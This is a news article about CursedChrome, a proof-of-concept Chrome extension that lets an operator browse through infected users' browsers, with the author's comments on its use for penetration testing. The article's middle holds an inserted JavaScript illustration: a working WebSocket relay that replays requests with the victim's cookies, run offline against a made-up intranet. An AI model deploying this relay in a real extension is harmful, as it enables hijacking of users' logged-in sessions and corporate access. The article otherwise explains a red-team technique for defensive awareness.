Last week, a security researcher published a proof-of-concept Chrome extension that turns Chrome browsers into proxy bots, allowing hackers to browse the web using the identity of an infected user. The tool, called CursedChrome, was created by security researcher Matthew Bryant and released on GitHub as an open-source project.
CursedChrome has two parts: a client-side component (the Chrome extension itself) and a server-side component (a control panel that lists all CursedChrome bots).
Once the extension has been installed in a browser, the intruder can connect to the CursedChrome control panel and open a connection to any infected host.
The link between the extension and the control panel is a simple WebSocket connection, initiated by the extension, over which the control panel works as a classic HTTP reverse proxy: the attacker's HTTP requests are relayed to the extension, performed inside the victim's browser, and the responses are relayed back.
This means that when the intruder connects to an infected host, they can browse the web through the infected user's browser and, in doing so, hijack logged-in sessions and online identities to reach restricted areas such as intranets or corporate applications.
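The following is an added illustration of the proxy exchange described above, not CursedChrome's own code: a control-server side that wraps an operator's HTTP request in a JSON message, a browser-side handler that replays it with `fetch()` and the victim's cookies, and an in-memory stand-in for the WebSocket so the round trip runs offline. The message field names, the `intranet.example` host and the cookie value are assumptions chosen for the example.

```javascript
// Added illustration, not CursedChrome's own code: a minimal "browser pivot"
// over a WebSocket-style channel. The control server wraps the operator's HTTP
// request in a JSON message, the extension side replays it with fetch() from
// inside the victim's browser, and the response goes back over the same
// channel. Message field names, hostnames and cookies are assumptions.

// ---- Extension side (in a real extension: the background script) ----
async function handleProxyRequest(msg, fetchImpl) {
  // credentials: 'include' is the whole point of the attack: the browser
  // attaches the victim's own session cookies to the operator's request.
  const resp = await fetchImpl(msg.url, {
    method: msg.method,
    headers: msg.headers,
    body: msg.body === null ? undefined : msg.body,
    credentials: 'include',
    redirect: 'manual',   // hand redirects back to the operator unchanged
  });
  const headers = {};
  resp.headers.forEach((value, name) => { headers[name] = value; });
  return { id: msg.id, status: resp.status, headers, body: await resp.text() };
}

// ---- Control-server side ----
class PivotServer {
  constructor(sendToBot) {
    this.sendToBot = sendToBot;
    this.pending = new Map();   // request id -> resolver for the reply
    this.seq = 0;
  }
  // Turn an operator's HTTP request into a message for the bot; resolves
  // when the bot's reply arrives.
  request(method, url, headers = {}, body = null) {
    const id = ++this.seq;
    return new Promise((resolve) => {
      this.pending.set(id, resolve);
      this.sendToBot({ id, method, url, headers, body });
    });
  }
  onReply(reply) {
    const resolve = this.pending.get(reply.id);
    if (resolve) { this.pending.delete(reply.id); resolve(reply); }
  }
}

// ---- Offline stand-ins so the example runs without a network ----
// In-memory two-ended channel with the WebSocket-like send()/onmessage shape.
function makeChannel() {
  const a = {}, b = {};
  a.send = (data) => queueMicrotask(() => b.onmessage && b.onmessage({ data }));
  b.send = (data) => queueMicrotask(() => a.onmessage && a.onmessage({ data }));
  return [a, b];
}

const VICTIM_COOKIE = 'session=alice-7f3c';          // constructed value
function fakeFetch(url, init = {}) {
  // Stand-in for the browser's fetch(): a constructed intranet that only
  // answers 200 when the victim's session cookie is attached.
  const cookie = init.credentials === 'include' ? VICTIM_COOKIE : '';
  const ok = cookie === VICTIM_COOKIE && url.startsWith('https://intranet.example/');
  return Promise.resolve({
    status: ok ? 200 : 401,
    headers: new Map([['content-type', 'text/plain']]),
    text: () => Promise.resolve(ok ? 'Welcome back, alice' : 'Login required'),
  });
}

// One round trip: the operator asks for an intranet page, the bot fetches it
// with the victim's cookies, and the operator receives the authenticated
// response that a direct, cookie-less request would not get.
async function simulatePivot() {
  const [botEnd, serverEnd] = makeChannel();
  botEnd.onmessage = async (ev) => {
    const reply = await handleProxyRequest(JSON.parse(ev.data), fakeFetch);
    botEnd.send(JSON.stringify(reply));
  };
  const server = new PivotServer((msg) => serverEnd.send(JSON.stringify(msg)));
  serverEnd.onmessage = (ev) => server.onReply(JSON.parse(ev.data));

  const viaBot = await server.request('GET', 'https://intranet.example/dashboard');
  const direct = await fakeFetch('https://intranet.example/dashboard', { credentials: 'omit' });
  return { viaBot, directStatus: direct.status };
}

simulatePivot().then((r) =>
  console.log(`via bot: ${r.viaBot.status} "${r.viaBot.body}"; direct: ${r.directStatus}`));
```

Run it with `node`. Two design points carry over to the real tool: the browser end dials out, so from the network's point of view the channel is just another outbound WebSocket, and the server never needs the victim's credentials because the browser attaches them itself. That second point is why the response contains the logged-in page while the direct request is refused.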
A project like CursedChrome is the perfect tool for an intruder.
CursedChrome was created as a tool for pen-testers
However, in an interview last week, Bryant said that was not his intention.
"I open-sourced it because I want other professional red teamers and pen-testers to be able to accurately simulate the malicious browser extension scenario," Bryant told us.
By red teamers, the researcher means cybersecurity professionals who are paid to break into companies. Their work is vital because they report what they find, so companies can fix the issues and keep real attackers out.
The researcher also said that CursedChrome is nothing an intruder could not have built themselves. The project builds on existing technologies and brings no innovation to the table.
"Tools like Cobalt Strike's 'browser pivot' (for Internet Explorer) and the BeEF open source framework have been around for years, and the technical details of how to do this attack are freely available on the internet," Bryant said.
In addition, Bryant is not worried that hackers may use his code. Weaponizing CursedChrome requires attackers either (1) to host the extension in the Chrome Web Store or (2) to install it through a corporate policy or through Chrome's developer mode.
Bryant says the first scenario is unlikely to work because "the Web Store extension review pipeline is extremely effective at catching potentially malicious extensions," while the second scenario requires an attacker to already have access to a company's network, at which point they already have full control and access to everything else.
Instead, the researcher said he wants to raise awareness of the problem of malicious Chrome extensions and the damage they can do in corporate environments.
Using something like CursedChrome, he says, pen-testers can show companies how exposed they really are when they don't strictly control what employees can install in their browsers.